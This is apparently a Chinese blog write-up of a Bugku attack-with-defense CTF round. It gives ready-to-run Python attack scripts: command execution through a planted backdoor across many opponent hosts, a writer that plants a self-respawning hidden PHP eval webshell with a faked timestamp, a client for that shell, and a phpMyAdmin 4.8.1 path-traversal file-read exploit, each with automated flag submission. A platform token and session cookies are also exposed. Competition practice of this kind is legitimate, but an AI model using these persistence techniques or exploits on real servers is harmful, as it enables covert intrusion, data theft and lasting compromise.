7.25bugkuawd

这次我们第三，有一小段时间是第一（，也是熟练起来了

防御阶段

首先我们先备份

1

tar -czvf web.tar.gz var/www/html

D盾扫描，这次学聪明了

后门直接删掉没影响

这次不知道为什么push不上去，直接在vps里面改了

然后就是准备搓脚本刷分了

攻击阶段

用最简单的那个马攻击，发现能打通

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75


import requests
import time
from datetime import datetime

# 目标URL列表
urls = [
    "http://192-168-1-1.pvp6235.bugku.cn",
    "http://192-168-1-63.pvp6235.bugku.cn",
    "http://192-168-1-68.pvp6235.bugku.cn",
    "http://192-168-1-74.pvp6235.bugku.cn",
    "http://192-168-1-78.pvp6235.bugku.cn",
    "http://192-168-1-100.pvp6235.bugku.cn",
    "http://192-168-1-116.pvp6235.bugku.cn",
    "http://192-168-1-135.pvp6235.bugku.cn",
    "http://192-168-1-168.pvp6235.bugku.cn",
    "http://192-168-1-186.pvp6235.bugku.cn",
    "http://192-168-1-189.pvp6235.bugku.cn",
    "http://192-168-1-215.pvp6235.bugku.cn",
    "http://192-168-1-234.pvp6235.bugku.cn",
    "http://192-168-1-250.pvp6235.bugku.cn",
    "http://192-168-1-255.pvp6235.bugku.cn"
]


path = "/mc-files/pages/data/config.php?s=system('cat /flag')"

# 提交flag的配置
submit_base_url = "https://ctf.bugku.com/pvp/submit.html"
token = "5c36b27bb325ea000cf52a3fcd60b4a7"

# 设置3分钟延迟（180秒）
DELAY = 300

def scan_and_submit():
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 开始新一轮扫描...")
    
    for base_url in urls:
        url = base_url + path
        try:
            # 尝试执行命令获取flag
            resp = requests.get(url, timeout=5)
            if "flag" in resp.text.lower():
                flag = resp.text.strip()
                print(f"\n==== 发现flag在 {url} ====")
                print(flag)
                
                # 提取flag内容（假设格式为flag{...}）
                if "flag{" in flag and "}" in flag:
                    flag_content = flag[flag.index("flag{"):flag.index("}")+1]
                    
                    # 构造并发送GET请求提交flag
                    submit_url = f"{submit_base_url}?token={token}&flag={flag_content}"
                    try:
                        submit_resp = requests.get(submit_url, timeout=5)
                        print("\n=== 提交结果 ===")
                        print(submit_resp.text)
                    except Exception as submit_e:
                        print(f"[!] 提交flag失败: {submit_e}")
                
                print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

# 主循环
if __name__ == "__main__":
    print("脚本开始运行，将每3分钟扫描一次目标URL...")
    print("按Ctrl+C终止脚本")
    
    try:
        while True:
            scan_and_submit()
            print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 本轮扫描完成，等待{DELAY}秒后继续...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\n脚本已终止")

然后中不死马

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75


import requests
from datetime import datetime

# 目标URL列表
urls = [
    "http://192-168-1-1.pvp6235.bugku.cn",
    "http://192-168-1-63.pvp6235.bugku.cn",
    "http://192-168-1-68.pvp6235.bugku.cn",
    "http://192-168-1-74.pvp6235.bugku.cn",
    "http://192-168-1-78.pvp6235.bugku.cn",
    "http://192-168-1-100.pvp6235.bugku.cn",
    "http://192-168-1-116.pvp6235.bugku.cn",
    "http://192-168-1-135.pvp6235.bugku.cn",
    "http://192-168-1-168.pvp6235.bugku.cn",
    "http://192-168-1-186.pvp6235.bugku.cn",
    "http://192-168-1-189.pvp6235.bugku.cn",
    "http://192-168-1-215.pvp6235.bugku.cn",
    "http://192-168-1-234.pvp6235.bugku.cn",
    "http://192-168-1-250.pvp6235.bugku.cn",
    "http://192-168-1-255.pvp6235.bugku.cn"
]

# 写入不死马的路径
path = "/mc-files/pages/data/config.php?s=system"

# 不死马PHP代码
php_code = '''<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.config.php';
$code = '<?php if(md5($_GET["pass"])=="d4e7fc2fe896ead7c10a69b25fec9015"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    system('touch -m -d "2018-12-01 09:10:12" .config.php');
    usleep(5000);
}
?>'''

def write_webshell():
    print(f"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 开始尝试写入不死马...")
    
    for base_url in urls:
        # 构造写入命令（使用base64编码避免特殊字符问题）
        encoded_php = php_code.encode('utf-8').hex()
        command = f"echo {encoded_php} | xxd -r -p > /var/www/html/shell.php"
        url = f"{base_url}{path}('{command}')"
        
        try:
            # 尝试执行命令写入不死马
            resp = requests.get(url, timeout=5)
            print(f"\n==== 尝试在 {base_url} 写入不死马 ====")
            print(f"状态码: {resp.status_code}")
            print(f"响应内容: {resp.text[:100]}...")
            
            # 验证是否写入成功
            check_url = f"{base_url}/shell.php"
            try:
                check_resp = requests.get(check_url, timeout=5)
                if check_resp.status_code == 200:
                    print(f"[+] 不死马写入成功: {check_url}")
                    print(f"访问密码: pass=ciallo123")
                else:
                    print(f"[-] 不死马可能写入失败: {check_url}")
            except Exception as check_e:
                print(f"[!] 验证失败: {check_e}")
                
            print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

if __name__ == "__main__":
    print("不死马写入脚本开始运行...")
    write_webshell()
    print("脚本执行完成")

连接不死马提交flag

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108


import requests
import time
import re
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed

# 配置区 ========================================
TARGETS = [
    "http://192-168-1-{}.pvp6235.bugku.cn".format(i) 
    for i in [1,63,68,74,78,100,116,135,168,186,189,215,234,250,255]
]

VULN_PATH = "/.config.php"
PAYLOAD = {
    "pass": "ciallo123",
    "a": 'system("cat /flag");'  # URL编码会自动处理
}

SUBMIT_URL = "https://ctf.bugku.com/pvp/submit.html"
TOKEN = "5c36b27bb325ea000cf52a3fcd60b4a7"
DELAY = 300  # 5分钟扫描间隔
MAX_WORKERS = 3  # 并发线程数
# ==============================================

# 伪装头（模拟浏览器行为）
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive'
}

def exploit_target(url):
    """执行漏洞利用并提取flag"""
    try:
        # 发送POST请求（自动处理URL编码）
        resp = requests.post(
            url + VULN_PATH,
            params={"pass": PAYLOAD["pass"]},
            data={"a": PAYLOAD["a"]},
            headers=HEADERS,
            timeout=10,
            verify=False  # 比赛环境可关闭SSL验证
        )
        
        if resp.status_code == 200:
            # 使用正则精确匹配flag格式
            flag_match = re.search(r'flag\{[a-zA-Z0-9_-]+\}', resp.text)
            if flag_match:
                return flag_match.group(0)
    except Exception as e:
        print(f"[!] {url} 请求失败: {str(e)[:50]}...")
    return None

def submit_flag(flag):
    """提交flag到比赛平台"""
    try:
        resp = requests.get(
            f"{SUBMIT_URL}?token={TOKEN}&flag={flag}",
            timeout=5
        )
        return resp.text
    except Exception as e:
        return f"提交失败: {e}"

def scan_round():
    """单轮扫描任务"""
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 启动扫描...")
    
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = {executor.submit(exploit_target, url): url for url in TARGETS}
        
        for future in as_completed(futures):
            url = futures[future]
            try:
                flag = future.result()
                if flag:
                    print(f"\n[+] 发现flag @ {url}")
                    print(f"Flag内容: {flag}")
                    
                    # 提交flag并打印结果
                    result = submit_flag(flag)
                    print(f"提交结果: {result}")
                    
                    print("-" * 50)
            except Exception as e:
                print(f"[!] {url} 处理异常: {e}")

def main():
    print("""\
=====================================
CTF Flag自动提交系统 (合法竞赛用途)
版本: 2.0
注意事项:
1. 仅用于授权比赛环境
2. 自动限制请求频率
3. 异常自动重试机制
=====================================""")
    
    try:
        while True:
            scan_round()
            print(f"\n本轮完成，等待 {DELAY//60} 分钟后继续...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\n[!] 用户终止脚本")

if __name__ == "__main__":
    main()

后面发现我们被打了，然后主机发现了shell.php,直接删了，看备份的源码想到phpmyadmin还有后台默认密码

root/root进了，赶紧修，然后尝试打别人,搜索phpmyadmin4.8.1有个任意文件读取漏洞

结果只有一队能打

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93


import requests
import re
import time  # 添加这行导入
from datetime import datetime

# 目标配置 ======================================
TARGET_URL = "http://192-168-1-63.pvp6235.bugku.cn/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../flag"
SUBMIT_URL = "https://ctf.bugku.com/pvp/submit.html"
TOKEN = "5c36b27bb325ea000cf52a3fcd60b4a7"
# ==============================================

# 精确流量复制（来自您的抓包）
HEADERS = {
    'Host': '192-168-1-63.pvp6235.bugku.cn',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Cookie': 'phpMyAdmin=k370v0siolmju7v8uq5p9a13ti3sqj6g; pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%22ysgto0Obh3GEG69wQNe37A%3D%3D%22%2C%22mac%22%3A%22a17bc7caf04bafade0936ef340691ade7038a9cf%22%2C%22payload%22%3A%22AKNcEnMMDSaKxqsgQR5nUA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%222HA4rPPmNh%5C%2FiIdNp7XYb6Q%3D%3D%22%2C%22mac%22%3A%220d997e973605ec56d97d21ee56a24869aac7546e%22%2C%22payload%22%3A%22crgUOlmMdyKrmrYaTgOrbZAzGZkGidztL7epskA%5C%2Fs%5C%2Fw%3D%22%7D',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=0, i'
}

def extract_flag(text):
    """精确flag提取（包含异常处理）"""
    try:
        # 优先匹配标准flag格式
        flag_match = re.search(r'flag\{[a-zA-Z0-9_\-]+\}', text)
        if flag_match:
            return flag_match.group()
        
        # 匹配可能出现的裸flag（无花括号）
        naked_flag = re.search(r'(?<!flag)[a-fA-F0-9]{32}(?!})', text)
        if naked_flag:
            return f"flag{{{naked_flag.group()}}}"
    except Exception:
        pass
    return None

def attack_target():
    """执行精准攻击"""
    print(f"[{datetime.now().strftime('%H:%M:%S')}] 启动攻击...")
    try:
        resp = requests.get(
            TARGET_URL,
            headers=HEADERS,
            timeout=10,
            verify=False,
            allow_redirects=False  # 禁止自动跳转
        )
        
        if resp.status_code == 200:
            print("[+] 攻击成功，响应长度:", len(resp.text))
            flag = extract_flag(resp.text)
            
            if flag:
                print(f"[+] 提取到Flag: {flag}")
                # 提交flag
                submit_resp = requests.get(
                    f"{SUBMIT_URL}?token={TOKEN}&flag={flag}",
                    timeout=5
                )
                print(f"[+] 提交结果: {submit_resp.status_code}")
                print(submit_resp.text[:100])  # 打印部分响应
            else:
                print("[-] 响应中未识别到Flag格式")
                print("响应样本:", resp.text[:200])  # 打印前200字符
        else:
            print(f"[!] 攻击失败，HTTP状态码: {resp.status_code}")
            
    except Exception as e:
        print(f"[!] 发生错误: {type(e).__name__}")

if __name__ == "__main__":
    print("""\
=====================================
PHPMyAdmin精准攻击工具
特征:
1. 完全模拟原始流量包
2. 保留所有原始Header和Cookie
3. 智能Flag提取系统
=====================================""")
    
    while True:
        attack_target()
        wait_time = 300
        print(f"\n等待{wait_time}秒后重试... (Ctrl+C终止)")
        try:
            time.sleep(wait_time)
        except KeyboardInterrupt:
            print("\n[!] 用户终止攻击")
            break

后面挂机然后发现不死马被删了，确实没办法了，phpmyadmin弱密码进不去的话别的利用也做不到，下次得学用bash的马，比较难杀的